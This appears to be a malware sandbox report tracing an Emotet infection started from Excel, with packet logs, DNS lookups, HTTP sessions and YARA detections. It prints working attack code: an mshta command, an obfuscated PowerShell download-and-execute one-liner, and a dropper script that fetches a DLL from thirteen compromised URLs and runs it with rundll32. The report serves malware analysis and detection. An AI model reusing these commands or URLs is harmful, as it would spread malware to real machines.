                                                                                                                    Jan 28, 2022 21:15:09.072216034 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072222948 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072226048 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072228909 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072232962 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072242975 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072251081 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072263002 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072268963 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072278023 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072285891 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072288990 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072303057 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072313070 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072319984 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072329044 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072338104 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072350025 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072355986 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072365999 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072372913 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072390079 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072406054 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072408915 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072413921 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072419882 CET8049167136.0.111.15192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 28, 2022 21:15:07.777925014 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Jan 28, 2022 21:15:07.797043085 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 28, 2022 21:15:07.777925014 CET | 192.168.2.22 | 8.8.8.8 | 0x56d6 | Standard query (0) | tamiladsense.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 28, 2022 21:15:07.797043085 CET | 8.8.8.8 | 192.168.2.22 | 0x56d6 | No error (0) | tamiladsense.com |  | 136.0.111.15 | A (IP address) | IN (0x0001)
                                                                                                                    • 91.240.118.172
                                                                                                                    • tamiladsense.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 91.240.118.172 | 80 | C:\Windows\System32\mshta.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    Jan 28, 2022 21:15:03.049511909 CET0OUTGET /ee/ss/se.html HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US
                                                                                                                    UA-CPU: AMD64
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                    Host: 91.240.118.172
                                                                                                                    Connection: Keep-Alive
Jan 28, 2022 21:15:03.108724117 CET | 2 | IN | HTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.20.2
                                                                                                                    Date: Fri, 28 Jan 2022 20:15:03 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 91.240.118.172 | 80 | C:\Windows\System32\mshta.exe

Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 21:15:07.666040897 CET | 12 | OUT | GET /ee/ss/se.png HTTP/1.1
                                                                                                                    Host: 91.240.118.172
                                                                                                                    Connection: Keep-Alive
Jan 28, 2022 21:15:07.729461908 CET | 14 | IN | HTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.20.2
                                                                                                                    Date: Fri, 28 Jan 2022 20:15:07 GMT
                                                                                                                    Content-Type: image/png
                                                                                                                    Content-Length: 1355
                                                                                                                    Connection: keep-alive
                                                                                                                    Last-Modified: Fri, 28 Jan 2022 09:57:38 GMT
                                                                                                                    ETag: "54b-5d6a176fe2880"
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Data Ascii: $path = "C{Joo}:\{Joo}Prog{Joo}ramD{Joo}ata\M{Joo}ilossd.{Joo}dl{Joo}l".replace('{Joo}','');$url1 = 'http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/';$url2 = 'http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/';$url3 = 'http://tunbridgeservices.com/jfoeqhxz/zOX0/';$url4 = 'https://mypurealsystem.com/App_Start/Rhh8lKO/';$url5 = 'http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/';$url6 = 'http://engaz.shop/wp-content/MOllqUm2nb/';$url7 = 'https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/';$url8 = 'http://3-fasen.com/wp-content/3Bl0hBbW/';$url9 = 'https://vn.minino.com/wp-admin/c3WQa/';$url10 = 'https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/';$url11 = 'http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/';$url12 = 'https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/';$url13 = 'http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12,$url13".split(",");foreach ($url in $urls) { try {
Jan 28, 2022 21:15:07.729482889 CET | 14 | IN
                                                                                                                    Data Ascii: $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } } catch{}} Sleep -s 3;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\ProgramData\Miloss


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49167 | 136.0.111.15 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 21:15:07.946124077 CET | 15 | OUT | GET /wp-includes/BEADvqGgemV8SnTX/ HTTP/1.1
                                                                                                                    Host: tamiladsense.com
                                                                                                                    Connection: Keep-Alive
Jan 28, 2022 21:15:08.091576099 CET | 16 | IN | HTTP/1.1 200 OK
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Set-Cookie: 61f44ecc07555=1643400908; expires=Fri, 28-Jan-2022 20:16:08 GMT; Max-Age=60; path=/
                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Last-Modified: Fri, 28 Jan 2022 20:15:08 GMT
                                                                                                                    Expires: Fri, 28 Jan 2022 20:15:08 GMT
                                                                                                                    Content-Type: application/x-msdownload
                                                                                                                    Content-Disposition: attachment; filename="XrEtCt.dll"
                                                                                                                    Content-Transfer-Encoding: binary
                                                                                                                    Content-Length: 557056
                                                                                                                    Date: Fri, 28 Jan 2022 20:15:08 GMT



                                                                                                                    Target ID:0
                                                                                                                    Start time:21:14:15
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                    Imagebase:0x13f560000
                                                                                                                    File size:28253536 bytes
                                                                                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    Target ID:2
                                                                                                                    Start time:21:14:16
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd
                                                                                                                    Imagebase:0x4a030000
                                                                                                                    File size:345088 bytes
                                                                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    Target ID:4
                                                                                                                    Start time:21:14:17
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo %ooo% "
                                                                                                                    Imagebase:0x4a030000
                                                                                                                    File size:345088 bytes
                                                                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    Target ID:5
                                                                                                                    Start time:21:14:17
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:cmd
                                                                                                                    Imagebase:0x4a030000
                                                                                                                    File size:345088 bytes
                                                                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    Target ID:6
                                                                                                                    Start time:21:14:18
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:mshta http://91.240.118.172/ee/ss/se.html
                                                                                                                    Imagebase:0x13fd10000
                                                                                                                    File size:13824 bytes
                                                                                                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    Target ID:8
                                                                                                                    Start time:21:14:20
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                                                                                                                    Imagebase:0x13f180000
                                                                                                                    File size:473600 bytes
                                                                                                                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                    Reputation:high

                                                                                                                    Target ID:10
                                                                                                                    Start time:21:14:29
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
                                                                                                                    Imagebase:0x4a3f0000
                                                                                                                    File size:345088 bytes
                                                                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    Target ID:11
                                                                                                                    Start time:21:14:30
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
                                                                                                                    Imagebase:0xec0000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.443244837.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    Target ID:12
                                                                                                                    Start time:21:14:35
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\Milossd.dll",DllRegisterServer
                                                                                                                    Imagebase:0xec0000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510464737.0000000002CF1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510287777.00000000026A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510322311.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510432409.0000000002830000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510167906.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510522270.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510145612.00000000008B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.509996233.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510607759.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510494175.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510409215.0000000002801000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510379453.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510352151.0000000002761000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510556451.0000000002E91000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510119980.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    Target ID:13
                                                                                                                    Start time:21:15:00
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",RIBFxhGufP
                                                                                                                    Imagebase:0xec0000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.516180172.0000000000601000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.515850446.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.516839554.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    Target ID:14
                                                                                                                    Start time:21:15:07
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",DllRegisterServer
                                                                                                                    Imagebase:0xec0000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559443936.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559926602.0000000000E81000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559812770.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.560189924.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559719503.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.560022976.00000000025B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.560265506.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559589643.0000000000291000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.560140675.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.560066037.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559766532.0000000000C21000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559961394.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559901253.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.560096641.0000000002901000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559852842.0000000000D81000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    Target ID:16
                                                                                                                    Start time:21:15:25
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",RPzUMBQVQiRJfbr
                                                                                                                    Imagebase:0xec0000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.562101992.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.562204420.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.562837454.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security

                                                                                                                    Target ID:17
                                                                                                                    Start time:21:15:30
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",DllRegisterServer
                                                                                                                    Imagebase:0xec0000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664811796.0000000002D81000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.665343860.0000000003091000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664505889.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664861198.0000000002DB0000.00000040.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664965956.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664542338.0000000002B61000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.663059849.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.665031499.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.668746611.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.663136022.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664371125.0000000002A11000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664216814.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.665264578.0000000003031000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.663107682.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664407337.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664117517.00000000026D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664190998.00000000027D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664248445.0000000002881000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.665204361.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664471765.0000000002B01000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.665308751.0000000003061000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664297781.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.663687755.0000000000831000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664663684.0000000002D10000.00000040.00000010.00020000.00000000.sdmp, Author: Joe Security
